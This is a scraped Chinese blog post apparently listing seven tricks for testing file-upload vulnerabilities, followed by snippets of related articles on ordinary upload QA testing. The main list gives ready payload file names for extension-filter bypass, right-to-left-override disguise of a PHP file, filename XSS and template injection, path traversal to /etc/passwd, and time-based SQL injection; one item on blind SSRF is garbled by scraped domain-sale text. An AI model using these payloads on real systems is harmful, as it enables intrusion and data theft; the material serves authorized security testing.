常见的测试文件上传方法

最新推荐文章于 2024-06-28 13:54:55 发布
最新推荐文章于 2024-06-28 13:54:55 发布
阅读量1.6k 收藏
点赞数
分类专栏: 文件上传 文章标签: java 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52501704/article/details/128356568
版权

第一种:如果对文件类型进行了过滤只能上传JPG,PNG的话可以对文件名进行编码

例子:image.jpg的话可以改成image.jpg%23.html可能会绕过文件类型

第二种:如果还是对文件类型进行了过滤可以尝试一下换行:

例子:1.FileName=shell.jspx.

                                    jsp

         2.File

         Name=shell.jspx.jsp'

第三种:对文件修改成ip-v4.com domain is for sale | Buy with Epik.com可能会有惊喜(Blind SSRF)

第四种:尝试使用右到左覆盖,重命名上传的文件。比如说为namename.%E2%80%AEphp.jpg,现在改为name.gpj.php

第五种:文件名可能会存在XSS把文件名修改成:'"><img src=x onerror=alert(document.domain)>.extension或者 {{constructor.constructor('alert(1)')()}}.extension

第六种:可能会造成任意文件读取把文件名修改成:image.png../../../../../../../etc/passwd

第七种:可能会存在Time-Based SQLi修改文件名称:poc.js'(select*from(select(sleep(20)))a)+'.extension

【网络安全测试文件上传漏洞的 5 种高级方法
等风来
08-26 1954
深入了解文件上传漏洞后,我们可以实现严重性影响,即使它不是 webshell RCE,它仍然可以通过其他方式损害服务器:读取文件(curl_exec)、XXE、XSS 和覆盖现有文件。
文件上传怎么测试
weixin_44190647的博客
04-07 366
文件上传怎么测试? 功能测试 选择符合要求的文件,上传--------上传成功; 上传成功的文件名称显示----------显示正常(根据需求) 查看,下载上传成功的文件--------上传的文件可查看或下载 删除上传成功的文件-------------可删除 替换上传成功的文件-------------可替换 上传文件是否支持中文名称--------根据需求而定 文件路径是否可手动输入----------根据需求而定 手动输入正确的文件路径,上传-----上传成功 手动输入错误的文件路径,上传----
文件上传下载测试
人生不怕起点低,就怕没追求
06-28 1298
一、文件上传测试点 1. 功能性测试 正常文件上传 选择一个符合指定类型、大小和格式的文件进行上传,确保文件能够成功上传且内容保持完整。 检查上传后文件的名称、大小、格式等信息是否显示正确,确保无乱码、多余路径等问题。
文件上传通用测试点归纳总结
大田的博客
07-17 6453
1、上传符合被测系统格式(exe、rar、zip、txt、html等)2、上传正常大小的文件(注意边界值文件最大值、文件为0kb)5、上传成功后,删除后可以重新上传(替换操作)3、上传成功后,可以下载并查看文件是否完整。6、弱网测试,网速很慢时导致文件上传超时。4、上传成功后,可以删除上传的文件。5、上传木马文件,看能系统能否识别。6、上传成功后,界面显示是否正常。9、上传过程中,能否取消上传操作。2、上传超过系统规定大小的文件。10、选好文件后,取消上传操作。2、上传成功后,能看到文件名。...
Web测试文件上传测试
OKCRoss的博客
12-06 312
(1)文件类型正确、大小合适。   (2)文件类型正确,大小不合适。   (3)文件类型错误,大小合适。
文件上传测试
sunmengting0123的博客
02-08 1577
1、上传符合被测系统格式(exe、rar、zip、txt、html等)2、上传正常大小的文件(注意边界值:文件最大值、文件为 0kb)5、上传成功后,删除后可以重新上传(替换操作)3、上传成功后,可以下载并查看文件是否完整。6、弱网测试,网速很慢时导致文件上传超时。4、上传成功后,可以删除上传的文件。5、上传木马文件,看能系统能否识别。6、上传成功后,界面显示是否正常。9、上传过程中,能否取消上传操作。2、上传超过系统规定大小的文件。10、选好文件后,取消上传操作。2、上传成功后,能看到文件名。
Python接口测试文件上传实例解析
09-16
在本文中,我们将深入探讨如何使用Python的`requests`库来测试文件上传接口,通过一个具体的图片上传例子进行说明。 首先,我们需要了解接口上传文件的基本原理。通常,文件上传是通过HTTP的`POST`请求实现的,使用...
文件上传和下载的常见测试
01-12
文件上传和下载是许多应用程序和网站的基本功能之一,在进行测试时需要考虑多个方面的测试点,以下是文件上传和下载的常见测试点: 下载测试点 1. 右键另存为是否可以正确下载文件,并且记录下载次数 * 是否正确...
测试上传附件-思路和方法,是一个word文件
02-19
### 测试上传附件——思路与方法 #### 一、引言 在软件开发与日常办公过程中,经常需要将文档、代码等重要文件进行备份或共享。通过上传附件的方式,不仅能够方便地分享文件,还能确保数据的安全性。本文将详细介绍...
测试文件上传漏洞的 5 种高级方法.pdf
最新发布
10-11
文件上传漏洞是网络应用中常见安全问题,它允许攻击者上传恶意文件,从而控制目标服务器。测试和发现这类漏洞的方法主要有以下几种: 1. 检查PHP的disabled_functions配置项。黑客可能会上传PHP文件,但这些文件...
http请求测试工具,可以上传文件
06-30
用来测试rest的一个工具类,我觉得比较好的是可以发送文件
文件上传下载测试用例
03-18
文件上传下载测试用例,非常全面的测试学习资料,吐血整理。
文件上传自动化测试方案
一个不太黑的测试人~
12-13 1110
百度网盘作为文件存储及分享的平台,核心功能大部分是对文件的操作,如果要对它进行自动化测试,优先覆盖的就是上传、分享、复制功能
文件上传自动化测试方案(超详细)
zhangsiyuan1998的博客
12-15 1820
测试地址】:https://pan.baidu.com【测试工具】:selenium、requests【脚本语言】:Python【运行环境】:Windows百度网盘作为文件存储及分享的平台,核心功能大部分是对文件的操作,如果要对它进行自动化测试,优先覆盖的就是上传、分享、复制功能图 1-1 系统流程图。
上传文件测试
q297422的博客
06-28 2750
上传文件测试
软件测试常用测试点之文件上传
qq_37772593的博客
05-16 2528
6.如果有多个客户端,多个客户端同时上传多个文件,而文件中有个别文件名相同,系统如何处理。8.批量上传过程中,发生异常中断,是部分未传完的文件撤销,还是全部文件撤销。7.批量上传过程中,部分文件,被撤销,是否会影响其他正常上传的文件。2.上传过程中断网,恢复网络后,是否能接着已上传的进度,继续上传。视频:mp4/avi/flv/mov/swf/wmv/qlv…3.文件上传过程中,是否支持取消,正在上传的文件。4.文件上传过程中,在本地删除文件,是否支持删除。图片常用格式:jpg/png/gif/bmp……
文件上传功能测试点整理
ZJL1300349805的博客
10-14 5045
最近有任务中包含了上传功能的测试,总结下文件上传的功能测试点~ 文件类型检查 指定的文件类型,允许上传 指定之外的文件类型,不允许上传并做出合理提示 指定的文件类型后缀大写,允许上传 指定的文件类型后缀大小写混合,允许上传 文件大小检查 假设限制上传文件最大为X: 指定文件类型的文件小于X,允许上传 指定文件类型的文件等于X,不允许上传 指定文件类型的文件大于X,不允许上传并给出合理提示 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值